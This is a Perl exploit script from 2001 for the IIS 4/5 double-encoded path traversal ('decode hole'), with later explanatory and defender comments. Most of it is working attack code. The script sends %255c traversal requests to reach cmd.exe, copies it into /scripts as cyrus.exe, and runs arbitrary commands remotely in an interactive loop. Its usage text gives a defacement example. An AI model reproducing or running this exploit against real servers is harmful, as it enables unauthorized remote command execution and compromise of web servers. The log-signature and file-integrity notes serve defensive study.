#!/usr/bin/perl
# Written by Cyrus The Gerat , CyrusArmy@Bigfoot.com , May 15th 2001
# This perl script lets you test servers for the IIS4/5 CGI decode hole,
# Also you can exploit the hole and execute your commands remotely!
# Vulnerability found by NSfocus security team,
# Tested for compatibility on UNIX/WINDOWS (activestate perl)
# Works well on windows and unix platforms,

# Flat script, top to bottom: argument check, vulnerability probe, optional
# staging of a command-interpreter copy, one command from the command line,
# then an interactive loop reading further commands from STDIN.
# It runs without `use strict`/`use warnings`, so $ARGC, @results, $i, $line
# and $command are all package globals.
#
# Defender notes (everything below is visible in the request strings):
#  - every request is either "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?..."
#    or "GET /scripts/cyrus.exe?/c+...", so a web-log or IDS rule keyed on
#    "%255c" and on "cmd.exe" in the request line catches the whole session;
#  - a successful run leaves an artifact named cyrus.exe in the /scripts
#    directory, which is a file-integrity signal on the server itself.
$ARGC=@ARGV;   # array in scalar context: number of command-line arguments
if ($ARGC <3) {
print "\n\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
print "\n Usage:\n\n $0 <victim host> <victim port> <command line to execute>\n\n";
print " Victim Host: Address of IIS4/5 server vulnerable to decode hole! \n";
print " Victim port: HTTP/HTTPS port 80 or 443\n";
print " Command to Execute: for example \"echo Just hacked! > hacked.txt\" \n\n";
exit;
}
use Socket;

# File-scope lexicals; sendraw() below closes over $host, $port and $target.
# $notcopied is declared but never assigned or read anywhere in this file.
my
($host,$port,$target,$notvulnerable,$notfound,$notcopied,$accessdenied);
$host=$ARGV[0];
$port=$ARGV[1];
$target=inet_aton($host);   # packed 4-byte address; undef if resolution fails (not checked)
$notvulnerable=1;           # flags are "pessimistic": cleared only on a positive match
$notfound=1;
$accessdenied=0;

print "\nRemote IIS4/5 decode hole tester! By CyrusTheGreat ,CyrusArmy\@Bigfoot.com\n";
print "Connecting to server $host port $port..., \n\n";
# Probe request. The path uses the double-encoded traversal (%255c) that the
# decode bug mishandled; the query runs `ver`. Response lines come back as a list.
@results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver HTTP/1.0\r\n\r\n");

# Echo the first eight response lines (status line and headers, typically);
# $i is a package global because nothing declares it.
for ($i=0; $i <=7 ;$i++ ) {
print $results[$i];
}
 

# Any response line containing "[Version" (presumably the `ver` banner) is
# taken as proof that the command ran on the server.
foreach $line (@results){
if ($line =~ /\[Version/) {
$notvulnerable=0;
print "\nWow! system is vulnerable.\n";
print $line;
}
}

if ($notvulnerable) {
print "\nOops! System is not vulnerable. \n";
exit(1);
}

# you can exchange Wow! and Oops! as you prefer! ;-)

# Second probe: `dir cyrus.exe` in /scripts. Any response line mentioning
# cyrus.exe is treated as "a copy already exists".
print "\nChecking for command interpreter...\n";
@results=sendraw("GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir%20cyrus%2eexe HTTP/1.0\r\n\r\n");
#print @results;

foreach $line (@results){
if ($line =~ /cyrus.exe/) {$notfound=0;}
}

# If no copy exists, request a `copy` of cmd.exe into /scripts as cyrus.exe;
# @results is overwritten with that response.
if ($notfound) {
print "Command interpreter not found, Trying to copy cmd.exe \n";
@results=sendraw("GET
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+%2e%2e%5c%2e%2e%5cwinnt%5csystem32%5ccmd%2eexe+cyrus%2eexe
HTTP/1.0\r\n\r\n");
#print @results;
}

# Scans whichever response is currently in @results (the `dir` one if the copy
# step was skipped) for the word "denied".
foreach $line (@results){
if (($line =~ /denied/ )) {$accessdenied=1;}
}

if ($accessdenied) {
print"Cannot copy command interpreter, Try manually! \n\n";
exit(2);
} else {
print "Command interpreter OK \n";
}

# @ARGV[2] is a one-element array slice; in scalar assignment it yields the
# element, so this works, but $ARGV[2] is the conventional scalar form.
$command=@ARGV[2];
print "Now executing your command: $command \n\n";
#$command=~s/ /\%20/g;
# Percent-encode every non-word character (\W) as "%" followed by its hex code.
$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg;
#print $command;
# From here on requests go to the staged copy (cyrus.exe) rather than through
# the traversal path; this `my @results` is a file-scope lexical shadowing the
# package global used above.
my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;

# Interactive loop: one request per line read from STDIN until EOF.
print STDOUT "\n\nMore commands? , or EOF to end:\n";
while ($command = <STDIN>) {
print "You said: $command \n";
chop $command;   # drops the last character (the newline from <STDIN>)
# Two statements on one line: same encoding as above, then a block-scoped
# @results that shadows the outer one for the duration of this iteration.
$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg; my @results=sendraw("GET /scripts/cyrus.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
print "\n\nTell me more, or EOF (^D/^Z) to end:\n";
}
print "\nThat's all! Another IIS hole just similified by cyrus!\n";

# sendraw($request) -> list of response lines.
#
# Opens a plain TCP connection to the file-scope $target/$port (lexicals
# declared at the top of the script and closed over here), writes $request
# verbatim, reads until the server closes the connection and returns every
# line read. No TLS handshake is performed, so despite the usage text the
# code as written only speaks cleartext HTTP. On connection failure it prints
# a message and terminates the whole process with exit status 3.
sub sendraw {
my ($pstr)=@_;   # raw request bytes; sent exactly as given

# Bareword package-global handle S. If getprotobyname fails the protocol
# number falls back to 0 (let the OS pick the default for SOCK_STREAM).
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
# Hand-packed sockaddr_in: "S" = 16-bit family (2 = AF_INET), "n" = port in
# network byte order, "A4" = the 4-byte packed address, "x8" = zero padding.
# Socket::sockaddr_in($port, $target) builds the same structure.
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
# Make S the default output handle, enable autoflush on it, then print the
# request (print with no handle goes to the selected handle).
select(S); $|=1; print $pstr;
# Read line by line until EOF. There is no timeout, so a server that keeps
# the connection open blocks this loop indefinitely.
while(<S>){ push @in, $_;}
# Restore STDOUT as the default handle before returning so later prints in
# the caller go to the terminal.
select(STDOUT); close(S); return @in;
} else {
print "Cannot connect to $host port $port\n";
exit(3); }
}